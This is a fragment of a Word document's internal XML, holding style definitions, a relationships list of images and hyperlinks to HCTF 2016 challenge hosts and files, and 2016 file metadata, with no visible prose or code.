  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a7">
    <w:name w:val="英文摘要正文"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="英文摘要正文 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Placeholder Text"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00383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semiHidden/>
    <w:rsid w:val="00383160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rsid w:val="00383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rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman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rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体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semiHidden/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="51">
    <w:name w:val="无格式表格 51"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="45"/>
    <w:rsid w:val="00383160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rsid w:val="00383160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无格式表格 31"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="43"/>
    <w:rsid w:val="00383160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0">
    <w:name w:val="无格式表格 21"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="42"/>
    <w:rsid w:val="00383160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">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00383160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图表样式"/>
    <w:basedOn w:val="af1"/>
    <w:link w:val="Char3"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="图表样式 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af0"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="黑体" w:hAnsi="Cambria"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="题注 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="35"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="黑体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="Date"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00383160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383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="32">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:ind w:left="480" w:firstLineChars="200" w:firstLine="480"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri"/>
      <w:iCs/>
      <w:noProof/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F9152E"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pull-right">
    <w:name w:val="pull-right"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F9152E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F9152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A45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A455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770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39.224.54.27/03c880e4aaa75efb2200c22e5dcd996d/rsa1.py" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/asm/asm.tar" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://atfield.hctf.io" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/yixyi/Re50.exe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39.224.54.27/fl4g/flag.png" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/fafafafafafa/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://2099.hctf.io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3.emf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hyperlink" Target="http://library.hctf.io/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mega.nz/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.pn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image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/forms/d/e/1FAIpQLSd_jXAEcC_iKEuXvVwfRpnN4BHYkaTRUzR_YqejT4eaPajqlw/viewform" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/e165421110ba03099a1c0393373c5b43/3802ed4c6af79cf848fcb6958960aedaff8511696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4.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png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64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://index-librorum-prohibitorum.hctf.io" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.pn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re4js.hctf.io/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/Re200/40998014e3d6a3a621ecb9d8e35fe8d0cf6b7403" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://guestbook.hctf.io/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/gogogo/hundouluo.nes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29.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://atfield.hctf.io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jinja.hctf.io/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pics.hctf.io/home.php?key=hduisa123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5.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sguestbook.hctf.io/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/webco1a/+_+.pcapng" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://139.224.54.27/mastercpp/main.cpp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28.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId65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hyperlink" Target="http://139.224.54.27/Shimakaze/shimakaze.bmp" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://changelog.hctf.io/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId5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275E-36E8-44DB-9528-F14B1AA8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4</Pages>
  <Words>3008</Words>
  <Characters>17152</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>142</Lines>
  <Paragraphs>40</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2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0373116@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>390373116@qq.com</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-28T11:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-28T12:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>